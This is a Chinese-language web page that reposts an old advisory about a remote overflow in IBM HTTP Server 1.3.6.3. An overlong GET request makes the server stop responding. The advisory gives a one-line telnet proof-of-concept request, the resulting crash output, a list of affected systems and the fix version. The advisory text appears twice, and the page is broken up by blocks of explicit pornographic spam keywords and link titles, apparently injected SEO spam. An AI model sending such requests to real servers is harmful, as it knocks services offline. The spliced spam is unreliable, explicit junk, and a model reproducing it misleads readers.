GET

描述:
通過提交超長的GET請求導致IBM HTTP Server遠程溢出


詳細:
IBM 的 HTTP 服務器是一個 web 服務器。在 Windows NT 使用的版本中存在拒絕服務的漏洞。

如果提交一個超過219個字符的 GET 請求 " /> 恋老视频 国产国佬,国产亚洲999精品AA片在线爽,精子射到丝袜上图

天天躁日日躁狠狠躁AV麻豆-天天躁人人躁人人躁狂躁-天天澡夜夜澡人人澡-天天影视香色欲综合网-国产成人女人在线视频观看-国产成人女人视频在线观看

IBM HTTP Server 遠程溢出漏洞

涉及程序:
GET

描述:
通過提交超長的GET請求導致IBM HTTP Server遠程溢出


詳細:
IBM 的 HTTP 服務器是一個 web 服務器。在 Windows NT 使用的版本中存在拒絕服務的漏洞。

如果提交一個超過219個字符的 GET 請求,將導致服務器停止響應,并報錯。要恢復服務正常工作需要重新啟動應用程序。成功的利用該漏洞,攻擊者可在受害的主機上執行任何代碼。(但這還未得到完全證實。)


以下代碼僅僅用來測試和研究這個漏洞,如果您將其用于不正當的途徑請后果自負


$ telNET target 80
GET /......(216個".")aaa HTTP/1.0

則系統會報告下列錯誤信息:
***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
ON_NOT_HANDLED.
***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
注意:目標主機運行在Windows 2000下。

受影響的系統
IBM HTTP Server 1.3.6.3
- TurboLinux Turbo Linux 3.0.1
- Sun Solaris 2.6
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 sparc
- Microsoft Windows NT 4.0
- IBM AIX 4.2.1
- Caldera OpenLinux 2.2

解決方案:
IBM 已經在 1.3.12 版本中解決了此問題,下載地址:
http://www-4.ibm.com/software/webservers/httpservers/download.html

jsp技術IBM HTTP Server 遠程溢出漏洞,轉載需保留來源!

鄭重聲明:本文版權歸原作者所有,轉載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯系我們修改或刪除,多謝。

主站蜘蛛池模板: 免费观看亚洲视频 | 亚洲AV精品无码喷水直播间 | nxgx69日本护士 | 欧美高清xxx | 99久久精品免费国产一区二区三区 | 特级aa 毛片免费观看 | 热99re久久精品国产首页 | japansemature护士| 国产午夜精品久久久久婷婷 | 公粗挺进了我的密道在线播放贝壳 | 久久久免费观成人影院 | 青青草在线 视频 | 一个人高清在线观看日本免费 | 国产亚洲综合视频 | 亚洲国产中文在线视频 | 成人在线观看国产 | 久久国产免费一区二区三区 | 永久免费看mv网站入口 | 国产婷婷色综合AV蜜臀AV | 一本道dvd久久综合高清免费 | 国产日韩久久久精品影院首页 | 无限资源在线观看8 | 九九热这里都是精品 | 亚洲精品动漫免费二区 | 护士们的母狗 | 兽皇VIDEO另类HD | 风月宝鉴之淫乱英雄传 电影 | 無码一区中文字幕少妇熟女网站 | GOGOGO高清在线播放免费 | 浪潮色诱AV久久久久久久 | 久久久久综合网久久 | 97在线视频免费 | 高清 仑乱 一级 a | 白嫩美女直冒白浆 | 俄罗斯美女破处 | 被室友C哭调教双性 | 狠狠色在在线视频观看 | 好男人好资源在线播放 | 国产在线观看码高清视频 | 全黄h全肉细节全文 | 日本熟妇多毛XXXXX视频 |